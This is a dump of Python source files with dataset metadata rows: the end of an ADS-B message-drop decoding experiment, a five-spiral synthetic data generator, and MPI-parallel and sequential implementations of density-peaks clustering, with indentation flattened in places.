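# a roughly eastbound track near (23.35 N, 110.87 E).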
actual_positions = [
(23.34635931557985, 110.8665426944272),
(23.34625894779067, 110.8676942564005),
(23.3460993127592, 110.8688379724686),
(23.34595425581612, 110.8699840542241),
(23.34581111111111, 110.8711305555556),
(23.34572208257996, 110.8722959681039),
(23.34561413057375, 110.8734468947545),
(23.34548167343178, 110.8745951079078),
(23.34533321223092, 110.8757400114616),
(23.34516545838654, 110.8768829102285),
]
adsb_sequence = generate_adsb_sequence(actual_positions)
def decode_pos(test_name: str, ignored_msg_indexes: set[int] | None = None):
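    """Replay the ADS-B sequence, skipping any message indexes listed in
    ignored_msg_indexes, and globally decode each position from the most
    recent even/odd pair. Prints and returns the error in metres of the
    final fix C10 against its true position.
    """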
print(test_name)
last_even_msg = ""
last_odd_msg = ""
start_index = 1
for i in range(len(adsb_sequence)):
if ignored_msg_indexes and i in ignored_msg_indexes:
continue
if pms.hex2bin(adsb_sequence[i])[53] == "0":
last_even_msg = adsb_sequence[i]
else:
last_odd_msg = adsb_sequence[i]
start_index = i + 1
break
for i in range(start_index, len(adsb_sequence)):
if ignored_msg_indexes and i in ignored_msg_indexes:
continue
if pms.hex2bin(adsb_sequence[i])[53] == "0":
last_even_msg = adsb_sequence[i]
if last_odd_msg == "":
continue
selected_msg = last_odd_msg
else:
last_odd_msg = adsb_sequence[i]
if last_even_msg == "":
continue
selected_msg = last_even_msg
calculated_pos = pms.adsb.airborne_position(selected_msg, adsb_sequence[i], 0, 1)
if i == len(adsb_sequence) - 1:
dist = distance.distance(calculated_pos, actual_positions[i]).m
print(f"C{i + 1}={calculated_pos} D={dist:.03f}m")
print()
return dist
# decode_pos("No dropped messages")
min_dist = float("inf")
max_dist = 0
min_dist_drop_desc = ""
max_dist_drop_desc = ""
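# Exhaustively try all 2**6 = 64 ways of dropping messages C4..C9
# (indexes 3..8) and record which drop patterns give the smallest and
# largest decoding error for the final fix C10.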
for i in range(1 << 6):
ignored_msg_indexes: set[int] = set()
for j in range(6):
if i & (1 << j):
ignored_msg_indexes.add(j + 3)
test_name = "{}" if len(ignored_msg_indexes) == 0 else str(ignored_msg_indexes)
dist = decode_pos(test_name, ignored_msg_indexes)
if dist > max_dist:
max_dist = dist
max_dist_drop_desc = test_name
if dist < min_dist:
min_dist = dist
min_dist_drop_desc = test_name
print(f"Min dist for C10: {min_dist:.3f}m when dropping {min_dist_drop_desc}")
print(f"Max dist for C10: {max_dist:.3f}m when dropping {max_dist_drop_desc}")
| 3,725 | Python | .py | 94 | 32.170213 | 89 | 0.607341 | ErnestThePoet/MU5735-ADSB-Reveal | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,597 | FiveSpiralData.py | alanxuji_FaithPDP/FiveSpiralData.py | import math
import numpy as np
import matplotlib.pyplot as plt
# save csv
import csv
# In Python 2, file could be used in place of open
# Use writerows to write multiple rows at once
tArr = np.arange(2, 4*np.pi, 0.001, dtype='float32')
size = len(tArr)
x = np.zeros(size)
y = np.zeros(size)
phi = [2.1, 2.8, 4.1, 4.8, 6.2]
dataAll = np.zeros((5*size,4),dtype='float32')
plt.rcParams['font.sans-serif'] = ['Times New Roman']
# plt.rcParams['figure.figsize']= (8, 6)
fig = plt.figure(figsize=(12, 12), linewidth=2)
ax = fig.gca()
for axis in ['top', 'bottom', 'left', 'right']:
ax.spines[axis].set_linewidth(2)
plt.title("5Spiral", fontsize=32)
plt.tick_params(width=2, labelsize=28)
index = 0
clusterID = 0
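# Each arm follows x(t) = -(t/8)*cos(t + phi), y(t) = -(t/8)*sin(t + phi)
# for t in [2, 4*pi); the five phase offsets give five interleaved arms
# of ~10.6k points each, ~53k points in total (hence "5Spiral50K").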
for phi_i in phi:
for i in range(size):
x[i] = -1*tArr[i]/8 * math.cos(tArr[i]+phi_i)
y[i] = -1 * tArr[i] / 8 * math.sin(tArr[i] + phi_i)
        dataAll[index] = [index, x[i], y[i], clusterID]
index += 1
clusterID += 1
plt.scatter(x,y)
with open("data/5Spiral50K.csv", "w", newline ='') as csvfile:
writer = csv.writer(csvfile)
writer.writerow(["Index", "x", "y", "clusterID"])
for i in range(5*size):
writer.writerow([int(dataAll[i,0]),dataAll[i,1], dataAll[i,2], int(dataAll[i,3])])
print("data saved!")
plt.show()
| 1,324 | Python | .py | 38 | 29.473684 | 91 | 0.621951 | alanxuji/FaithPDP | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,598 | FFP-DP-5Spiral.py | alanxuji_FaithPDP/FFP-DP-5Spiral.py | ##### AlanXu @ SKLPBD, GZU. 2024-1-15
##### For Faithful parallelism of Density Peaks Clustering
#### mpiexec -n 14 python FFP-DP-5Spiral.py
import time
from mpi4py import MPI
import numpy as np
from sklearn.preprocessing import MinMaxScaler
from utils import common
def DensityAndBarDistance(ranX, X, i, subSize):
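    """Compute, for batch i of this rank's slice ranX, each point's local
    density against the full dataset X, plus the indices and distances of
    its KNearest nearest neighbours (a narrow 'bar' slice of the distance
    matrix). Relies on the module-level BatchNum, dc and KNearest values.
    """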
if i == BatchNum - 1:
subX = ranX[i * subSize:, :]
else:
subX = ranX[i * subSize:(i + 1) * subSize, :]
TempRowNum = np.shape(subX)[0]
### Part against All distance
SubtDist = common.euclidian_dist(subX, X)
subDensity = common.ComputeLocalDensity(SubtDist, dc)
    ### partition via np.argpartition (not a full sort) is IMPORTANT for speed!
subKNearInds = (np.argpartition(SubtDist, KNearest))[:, 0:KNearest]
subKNearDist = np.zeros((TempRowNum, KNearest), dtype='float32')
for row in range(TempRowNum):
subKNearDist[row, :] = SubtDist[row, subKNearInds[row, :]]
return subDensity, subKNearInds, subKNearDist
def ClusterIDAssignment(density, leadingNodes, LeadingDistance, K):
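    """Rank points by gamma = density * leading distance, label the top-K
    points as cluster centers, then propagate each remaining point's label
    from the first labelled ancestor along its chain of leading nodes.
    """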
N = len(density)
Y = np.zeros(N,dtype="int")-1
potential = density * LeadingDistance
sortedPotentialInds = np.argsort(-1*potential)
for i in range(K):
Y[sortedPotentialInds[i]] = i
PathNodes = []
for j in range(N):
if Y[j] != -1:
continue
else:
PathNodes.append(j)
            pa = leadingNodes[j]
            while Y[pa] == -1:
                pa = leadingNodes[pa]
                PathNodes.append(pa)
#print("pa", pa, "path length:", len(PathNodes))
label = Y[pa]
for node in PathNodes:
Y[node] = label
PathNodes =[]
return Y
def FindLeadingNodeEasy(i, subSize, KNearDist, KNearInds, DensityAll, LeadingNodeInds, LeadingDistance):
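    """For each node in batch i, scan its KNearest neighbours in order of
    increasing distance and take the first denser one as its leading node.
    Nodes with no denser neighbour among their KNearest stay at -1 and are
    resolved in the fallback pass (Step Three).
    """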
if i == BatchNum - 1:
IDrange = range(i * subSize, N)
else:
IDrange = range(i * subSize, (i + 1) * subSize)
for nodeID in IDrange:
### solution One: sort KnearDist
distVec = KNearDist[nodeID, :]
distSortInds = np.argsort(distVec)
distVecSort = distVec[distSortInds]
RealDistSortInds = KNearInds[nodeID, distSortInds]
for j in range(KNearest):
possibleLeading = RealDistSortInds[j]
if DensityAll[possibleLeading] > DensityAll[nodeID]:
LeadingNodeInds[nodeID] = possibleLeading
LeadingDistance[nodeID] = distVecSort[j] ### Attention!
                break  ### found a denser neighbour, so stop searching
if __name__ == "__main__":
X, Y = common.load_data("data/5Spiral50K.csv", label_index=3)
X = X[:, 1:]
#X, _, _ = common.max_min_norm(X)
N = np.shape(X)[0]
scaler = MinMaxScaler()
X = scaler.fit_transform(X)
dc = 0.2
BatchNum = 20 ### for 500K
#BatchNum = 20
    ## width of the bar matrix, which stores each point's nearest-neighbour indices and distances
KNearest = 20
KNearInds = np.zeros((N, KNearest), dtype='int')
KNearDist = np.zeros((N, KNearest), dtype='float32')
DensityAll = np.zeros(N, dtype='float32')
t1 = time.time()
###### MPI Parallelism
comm = MPI.COMM_WORLD
    size = comm.Get_size()  #### e.g. 10 or 20; the last rank absorbs the remainder when N is not a multiple of size
rank = comm.Get_rank()
rankSize = int(N / size)
BeginID = int(rankSize * rank )
print("BeginID:", BeginID)
EndID = int(rankSize * (rank + 1) )
    if rank == size - 1:  #### handle the remaining samples when N is not an integer multiple of size
EndID = N
rankX = X[BeginID:EndID, ]
# comm.send(sum0, dest=size-1)
print("This is rank %d, on node2" % rank)
if rank == 0:
#subSize = int(N/BatchNum)
subSize = int(rankSize / BatchNum)
        ### simulate parallelism with data-independent sequential processing
#### Step One: compute rho and bar Distance matrices########
##############################################################
print("Computing local density and bar matrix....")
for i in range(BatchNum):
            if (i % 5 == 0):
                print("Batch No.", i, " of ", BatchNum)
## The last work takes all remainder
subDensity, subKNearInds, subKNearDist = DensityAndBarDistance(rankX, X, i, subSize)
##The last part
if i == BatchNum-1:
DensityAll[rankSize*rank+i * subSize:rankSize*(rank+1)] = subDensity
KNearInds[rankSize*rank+i * subSize:rankSize*(rank+1), :] = subKNearInds
KNearDist[rankSize*rank+i * subSize:rankSize*(rank+1), :] = subKNearDist
else:
DensityAll[rankSize*rank+i * subSize:rankSize*rank+(i + 1) * subSize] = subDensity
KNearInds[rankSize*rank+i * subSize:rankSize*rank+(i + 1) * subSize, :] = subKNearInds
KNearDist[rankSize*rank+i * subSize:rankSize*rank+(i + 1) * subSize, :] = subKNearDist
#####Collect data to process whose rank==0
for sendRank in range(1, size):
# recvDensity = comm.recv(source=sendRank, tag=1)
# recvKNearInds = comm.recv(source=sendRank, tag=2)
            # recvKNearDist = comm.recv(source=sendRank, tag=3)  #### still needs to be placed properly!!!
# DensityAll[rankSize * rank:rankSize * (rank + 1)] = recvDensity
# KNearInds[rankSize * rank:rankSize * (rank + 1), :] = recvKNearInds
# KNearDist[rankSize * rank :rankSize * (rank + 1), :] = recvKNearDist
recvEndID = rankSize * (sendRank + 1)
if sendRank == size-1:
recvEndID = N
DensityAll[rankSize * sendRank:recvEndID] = comm.recv(source=sendRank, tag=1)
KNearInds[rankSize * sendRank:recvEndID, :] = comm.recv(source=sendRank, tag=2)
KNearDist[rankSize * sendRank :recvEndID, :]= comm.recv(source=sendRank, tag=3) #
else:
#subSize = int(N/BatchNum)
subSize = int(rankSize / BatchNum)
        ### simulate parallelism with data-independent sequential processing
#### Step One: compute rho and bar Distance matrices########
##############################################################
print("Computing local density and bar matrix....")
for i in range(BatchNum):
            if (i % 5 == 0):
                print("Batch No.", i, " of ", BatchNum)
## The last work takes all remainder
subDensity, subKNearInds, subKNearDist = DensityAndBarDistance(rankX, X, i, subSize)
##The last part
if i == BatchNum-1:
BatchEndID = rankSize * (rank + 1)
if rank == size - 1:
BatchEndID = N
DensityAll[rankSize*rank+i * subSize:BatchEndID] = subDensity
KNearInds[rankSize*rank+i * subSize:BatchEndID, :] = subKNearInds
KNearDist[rankSize*rank+i * subSize:BatchEndID, :] = subKNearDist
else:
DensityAll[rankSize*rank+i * subSize:rankSize*rank+(i + 1) * subSize] = subDensity
KNearInds[rankSize*rank+i * subSize:rankSize*rank+(i + 1) * subSize, :] = subKNearInds
KNearDist[rankSize*rank+i * subSize:rankSize*rank+(i + 1) * subSize, :] = subKNearDist
SendEndID = rankSize * (rank + 1)
if rank == size - 1:
SendEndID = N
comm.send(DensityAll[rankSize * rank :SendEndID] , dest=0, tag = 1)
comm.send(KNearInds[rankSize * rank :SendEndID, :] , dest=0, tag = 2)
comm.send(KNearDist[rankSize * rank :SendEndID, :], dest=0, tag = 3)
comm.barrier()
print("density and matrices completed!")
if rank == 0: ### Step Two: compute leading nodes and leading distance ########
#############################################################
# DensityAllsortInds = np.argsort(DensityAll, 'descending')
# DensityAllsort = DensityAll[DensityAllsortInds]
#common.write_csv("KNearInds.csv", KNearInds)
#common.write_csv("DensityAll", DensityAll)
LeadingNodeInds = np.zeros(N, dtype="int")-1
LeadingDistance = np.zeros(N, dtype="float32")-1
print("Computing leading nodes and delta distance...")
for i in range(BatchNum):
## The last work takes all remainder
FindLeadingNodeEasy(i, subSize, KNearDist, KNearInds, DensityAll, LeadingNodeInds, LeadingDistance)
#### Step Three: compute leading nodes for those failed in Step Two ########
##############################################################
###Solution One, step A: sparse minicenters' distance matrix and extracted densities
        NotFoundInds = np.array([i for i in range(N) if LeadingNodeInds[i] == -1])
mcNum = len(NotFoundInds)
DensitysortInds = np.argsort(-DensityAll)
Densitysort = DensityAll[DensitysortInds]
### step B: Recomputing the distance between micro centers and the entire dataset
        mCenterX = X[NotFoundInds, :]  #### note: NotFoundInds is in index order; density ordering comes from DensitysortInds below
mCenterDist = common.euclidian_dist(mCenterX, X) ###Solution Two
##mCenterDist = common.euclidian_dist(mCenterX, mCenterX) ###Solution one
        for i in range(mcNum):  ### pay attention to index transferring
currInd = NotFoundInds[i]
if currInd == DensitysortInds[0] :
LeadingDistance[currInd] = max(mCenterDist[i, :])
continue
LeadingNodeInds[currInd] = DensitysortInds[0]
LeadingDistance[currInd] = mCenterDist[i, DensitysortInds[0]]
            StopDensityInd = list(DensitysortInds).index(currInd)
## Search Range
for j in range (1, StopDensityInd):
tmpj = DensitysortInds[j]
if mCenterDist[i,tmpj] < LeadingDistance[currInd]:
LeadingNodeInds[currInd] = tmpj
LeadingDistance[currInd] = mCenterDist[i, tmpj]
Y = ClusterIDAssignment(DensityAll, LeadingNodeInds, LeadingDistance, 5)
        t2 = time.time()
print("Time consumption (s):", t2-t1)
# print("Labels: \n",Y)
common.write_csv("Labels.csv",np.reshape(Y,(N,1)))
common.PlotCluster(X, Y)
####TESTING CODE#############
# D = common.euclidian_dist(X, X)
# lt1 = lt.LeadingTree(X_train=X, dc=0.2, lt_num=lt_num, D=D) # Constructing the lead tree for the entire dataset
# lt1.fit()
# print("leading distance diff:\n", LeadingDistance-lt1.delta)
| 10,742 | Python | .py | 207 | 40.869565 | 119 | 0.585087 | alanxuji/FaithPDP | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |
2,286,599 | FFP-DP-5Spiral-S.py | alanxuji_FaithPDP/FFP-DP-5Spiral-S.py | import time
import numpy as np
from sklearn.preprocessing import MinMaxScaler
from utils import common
def DensityAndBarDistance(X, i):
if i == BatchNum - 1:
subX = X[i * subSize:, :]
else:
subX = X[i * subSize:(i + 1) * subSize, :]
TempRowNum = np.shape(subX)[0]
### Part against All distance
SubtDist = common.euclidian_dist(subX, X)
subDensity = common.ComputeLocalDensity(SubtDist, dc)
    ### partition via np.argpartition (not a full sort) is IMPORTANT for speed!
subKNearInds = (np.argpartition(SubtDist, KNearest))[:, 0:KNearest]
subKNearDist = np.zeros((TempRowNum, KNearest), dtype='float32')
for row in range(TempRowNum):
subKNearDist[row, :] = SubtDist[row, subKNearInds[row, :]]
return subDensity, subKNearInds, subKNearDist
def ClusterIDAssignment(density, leadingNodes, LeadingDistance, K):
N = len(density)
Y = np.zeros(N,dtype="int")-1
potential = density * LeadingDistance
sortedPotentialInds = np.argsort(-1*potential)
for i in range(K):
Y[sortedPotentialInds[i]] = i
PathNodes = []
for j in range(N):
if Y[j] != -1:
continue
else:
PathNodes.append(j)
            pa = leadingNodes[j]
            while Y[pa] == -1:
                pa = leadingNodes[pa]
                PathNodes.append(pa)
print("pa", pa, "path length:", len(PathNodes))
label = Y[pa]
for node in PathNodes:
Y[node] = label
PathNodes =[]
return Y
def FindLeadingNodeEasy(i, subSize, KNearDist, KNearInds, DensityAll, LeadingNodeInds, LeadingDistance):
if i == BatchNum - 1:
IDrange = range(i * subSize, N)
else:
IDrange = range(i * subSize, (i + 1) * subSize)
for nodeID in IDrange:
        ### Solution one: sort this node's KNearDist row
distVec = KNearDist[nodeID, :]
distSortInds = np.argsort(distVec)
distVecSort = distVec[distSortInds]
RealDistSortInds = KNearInds[nodeID, distSortInds]
for j in range(KNearest):
possibleLeading = RealDistSortInds[j]
if DensityAll[possibleLeading] > DensityAll[nodeID]:
LeadingNodeInds[nodeID] = possibleLeading
LeadingDistance[nodeID] = distVecSort[j] ### Attention!
                break  ### found a denser neighbour, so stop searching
if __name__ == "__main__":
X, Y = common.load_data("data/5Spiral50K.csv", label_index=3)
X = X[:, 1:]
#X, _, _ = common.max_min_norm(X)
N = np.shape(X)[0]
scaler = MinMaxScaler()
X = scaler.fit_transform(X)
dc = 0.2
t1 = time.time()
    BatchNum = 500
subSize = int(N/BatchNum)
DensityAll = np.zeros(N, dtype='float32')
    ## width of the bar matrix, which stores each point's nearest-neighbour indices and distances
KNearest = 20
KNearInds = np.zeros((N,KNearest), dtype='int')
KNearDist = np.zeros((N, KNearest), dtype='float32')
    ### simulate parallelism with data-independent sequential processing
#### Step One: compute rho and bar Distance matrices########
##############################################################
print("Computing local density and bar matrix....")
for i in range(BatchNum):
        if (i % 5 == 0):
            print("Worker No.", i, " of ", BatchNum)
## The last work takes all remainder
subDensity, subKNearInds, subKNearDist = DensityAndBarDistance(X,i)
##The last part
if i == BatchNum-1:
DensityAll[i * subSize:] = subDensity
KNearInds[i * subSize:, :] = subKNearInds
KNearDist[i * subSize:, :] = subKNearDist
else:
DensityAll[i * subSize:(i + 1) * subSize] = subDensity
KNearInds[i * subSize:(i + 1) * subSize, :] = subKNearInds
KNearDist[i * subSize:(i + 1) * subSize, :] = subKNearDist
#### Step Two: compute leading nodes and leading distance ########
##############################################################
# DensityAllsortInds = np.argsort(DensityAll, 'descending')
# DensityAllsort = DensityAll[DensityAllsortInds]
LeadingNodeInds = np.zeros(N, dtype="int")-1
LeadingDistance = np.zeros(N, dtype="float32")-1
print("Computing leading nodes and delta distance...")
for i in range(BatchNum):
## The last work takes all remainder
FindLeadingNodeEasy(i, subSize, KNearDist, KNearInds, DensityAll, LeadingNodeInds, LeadingDistance)
#### Step Three: compute leading nodes for those failed in Step Two ########
##############################################################
###Solution One, step A: sparse minicenters' distance matrix and extracted densities
    NotFoundInds = np.array([i for i in range(N) if LeadingNodeInds[i] == -1])
mcNum = len(NotFoundInds)
DensitysortInds = np.argsort(-DensityAll)
Densitysort = DensityAll[DensitysortInds]
### step B: Recomputing the distance between micro centers and the entire dataset
    mCenterX = X[NotFoundInds, :]  #### note: NotFoundInds is in index order; density ordering comes from DensitysortInds below
mCenterDist = common.euclidian_dist(mCenterX, X) ###Solution Two
##mCenterDist = common.euclidian_dist(mCenterX, mCenterX) ###Solution one
    for i in range(mcNum):  ### pay attention to index transferring
currInd = NotFoundInds[i]
if currInd == DensitysortInds[0] :
LeadingDistance[currInd] = max(mCenterDist[i, :])
continue
LeadingNodeInds[currInd] = DensitysortInds[0]
LeadingDistance[currInd] = mCenterDist[i, DensitysortInds[0]]
        StopDensityInd = list(DensitysortInds).index(currInd)
## Search Range
for j in range (1, StopDensityInd):
tmpj = DensitysortInds[j]
if mCenterDist[i,tmpj] < LeadingDistance[currInd]:
LeadingNodeInds[currInd] = tmpj
LeadingDistance[currInd] = mCenterDist[i, tmpj]
Y = ClusterIDAssignment(DensityAll, LeadingNodeInds, LeadingDistance, 5)
    t2 = time.time()
print("Time consumption (s):", t2-t1)
common.PlotCluster(X, Y)
| 6,309 | Python | .py | 135 | 37.592593 | 108 | 0.605936 | alanxuji/FaithPDP | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:09 PM (Europe/Amsterdam) |